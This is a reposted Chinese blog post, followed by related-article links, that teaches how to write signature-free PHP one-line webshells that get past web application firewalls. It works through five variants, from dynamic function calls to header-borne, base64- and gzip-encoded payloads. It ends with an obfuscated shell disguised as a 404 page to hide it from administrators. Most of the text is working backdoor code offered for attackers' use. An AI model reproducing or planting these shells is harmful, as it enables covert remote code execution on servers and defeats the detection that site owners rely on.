(转)无特征过狗一句话猥琐思路
0×01 姿势一
我们知道PHP动态函数很有意思,那么你猜到了,姿势一就是:
<?php$_POST['xx']($_POST['oo']);?>
注意XX参数设置成EVAL是不行的哦,让我们来看看效果:
0×02 姿势二
关键词是过滤了,但是你老是交一些奇奇怪怪的东西,人家几万块买的WAF也不是吃白饭的啊。好好好你丑你说什么都是对的,我们不交了,getallheaders函数能够获取请求头内容,来试试新家伙:
<?phpeval(getallheaders()['Accept-Language']);>
当然你要是猥琐到这样,那恭喜你,你已经学会举一反三了...
<?php$a=getallheaders()['xxx'];$a(getallheaders()['ooo']);>
0×03 姿势三
遇到一般的waf可能上个姿势就能绕过,但是还是会有一些臭不要脸的waf会检测http请求头里的内容,咱们还是从技术角度出发来看看这个问题怎么绕过,猥琐的人可能首先想到了的base64,更猥琐的人可能想到了各种自写函数进行编码,替换,但是我见过最猥琐的思路是gzuncompress和gzcompress函数,话不多说我们先放壳:
<?phpeval(gzuncompress(base64_decode(getallheaders()['xx'])));>
http头部的里面的xx字段看起来像base64编码(其实实他就是base64编码),但是解开之后发现是乱码,waf识别不出来里面的内容,哈哈是不够够猥琐呢..如果你要是还没不够猥琐,那么来吧,互相伤害吧:
<?php$xx=gzuncompress(base64_decode(getallheaders()['xx']));$xx(gzuncompress(base64_decode(getallheaders()['oo'])));>
0x04 姿势四
目前为止,这个壳在传输过程中已经没有任何特征了,但是管理员毕竟是吃白饭的,某日浏览小黄文可能无意间发现你的壳,一堆什么莫名的的base64函数和查了半天资料也搞不懂的gzuncompress函数,管理员手一抖说不定就给删了呢,这时候你需要伪装你的壳,伪装成404是个比较安全的方法,为了防止管理员访问壳时出现未提交相应的http header导致php报错,我们再加上如果判断,完整的shell如下:
<!DOCTYPE HTMLPUBLIC"-//IETF//DTD HTML 2.0//EN"><html><head><title>404Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p>...<?php$xx=getallheaders()['xx'];$oo=getallheaders()['oo'];if($xx!=""and$oo!=""){$xx=gzuncompress(base64_decode($xx));$xx(gzuncompress(base64_decode($oo)));}> </body></html>
0x05 姿势五
可能你厌倦了每次提交数据都需要进行手动编码再提交。技术的目的本身就是机器代替手工,那好用蟒来写一个我们专属的一句话控制端吧。不过在这之前我们需要再此改进我们的外壳,使其变得更加隐蔽,更加实用最新版的外壳如下:
<!DOCTYPE HTMLPUBLIC"-//IETF//DTD HTML 2.0//EN"><html><head><title>404Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><?php//ZUp4THFyVHl5eS9LVGN5ckF3QVZGZ1Av; $error0="404_not_found";$error1="400_not_found";$error2="302_not_found";...$_="\x6d\x64\x35";$__=$_($_.$_.$_);$header_errors=chr(103).substr($__,14,1)."t".chr(97)."llh".substr($__,14,1)."aders";$base_errors=chr(98)."\x61".chr(115).substr($__,14,1)."6"."\x34"."_".chr(100)."\x65"."c".chr(111)."d".substr($__,14,1);$gz_errors="\x67\x7a".chr(117).chr(110)."com"."\x70\x72\x65\x73\x73";if($header_errors()[$error1]!=""and$header_errors()[$error2]!=""){echo$error0;$error=$gz_errors($base_errors($base_errors($header_errors()[$error2])));$error($gz_errors($base_errors($base_errors($header_errors()[$error1]))));echo$error0;}></body></html>
我们看到其实和上个姿势的差别主要是加了一些混淆,像的base64,gzuncompress等这些函数都进行了动态组合,更具有迷惑性,另外执行命令前后分别有一次回波进行输出,这主要是方便我们的一句话客户端在获取服务器相应内容后能够利用正则截取真正的执行结果,而不是多了一些其他的HTML之类的没用的内容。
附下我们客户端的执行效果:
PS:客户端目前只写了个小框架,后面功能稍微完善点之后会放给大家玩的。
转载于:https://www.cnblogs.com/backlion/p/7015724.html
(转)无特征过狗一句话猥琐思路相关推荐
- 猥琐思路复现Spring WebFlow远程代码执行
本文讲的是猥琐思路复现Spring WebFlow远程代码执行,说明:做安全的,思路不猥琐是日不下站的,必须变的猥琐起来,各种思路就会在你脑海中迸发. 1.不温不火的漏洞 这个漏洞在六月份的时候就被提 ...
- php一句话猥琐流搞法,最猥琐的一句话
1.弄一msn机器人,光会说句"是么?"就足够,别人说什么都这句,绝对聊遍天下无敌手. 2.你我皆烦人,剩在人世间. 3.一天到晚想死的鱼. 4.早晨在路上见一车,车后贴一标,标上 ...
- CTF之文件包含的猥琐思路
From: i春秋 百度杯"CTF 一: <?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['h ...
- PHP后门新玩法:一款猥琐的PHP后门分析
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就让我们一同共赏这 ...
- 一款猥琐的PHP后门分析
Webshell代码如下: <?php error_reporting(0); session_start(); header("Content-type:text/html;char ...
- 在线php后门查找,一款猥琐的PHP后门分析
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣.接下来就让我们一同共赏这 ...
- 过新版狗php一句话,过狗一句话-asp|php
发现有些思路很好的webshell已经被特征了 稍微改改就好了 asp过狗一句话↓原马儿 eXecUTe(fun("%167%184%163%174%98%180%167%179%183%1 ...
- [网络安全自学篇] 三十三.文件上传之绕狗一句话原理和绕过安全狗(六)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合C ...
- 你认识的老罗又回来了!罗永浩:我的创造力才刚刚开始猥琐发育
[TechWeb]昨日晚间,锤子科技CEO罗永浩在微博回复了大象公会创办人黄章晋的关于<吴晓波说罗永浩一个是梦太大,一个是入错行,吴主任说罗永浩深刻地改变了世界,请问你怎么评价他们的看法?> ...
最新文章
- 我是如何在尼日利亚的沃里创立Google Developers Group GDG分会的,并达到了100位成员...
- 我把帮带份饭的信息错发给导师后.......
- 牛津大学名誉教授Colin Blakemore:大脑是如何计算的?
- git删除远程已经没有的分支
- VISUAL STUDIO 2019 快捷键
- 博后招募 | 澳大利亚悉尼大学徐畅老师招收深度学习方向博士后/全奖博士
- One order datatype 命名规范
- 图像处理中的傅里叶变换和频率域滤波概念
- CAD/CAM/CNC行业常用功能解决方式
- Android开发之StrictMode
- 使用TortoiseSVN将文件回退到某个版本
- c语言中gotoxy,关于gotoxy的问题....
- python爬取豆瓣电影top250并保存为xlsx_批量抓取豆瓣电影TOP250数据
- 【IP路由基础(直连路由、静态路由的三种配置)】--20211203、20211206
- HDU 4565 (构造共轭函数+矩阵快速幂)
- 如何在Microsoft Word里面插入图片作为背景?
- 冰羚 example-icedelivery-README.md翻译
- JS Boolean 初始值
- 手写签名插件—jSignature使用心得
- 直播带货代运营公司9人被抓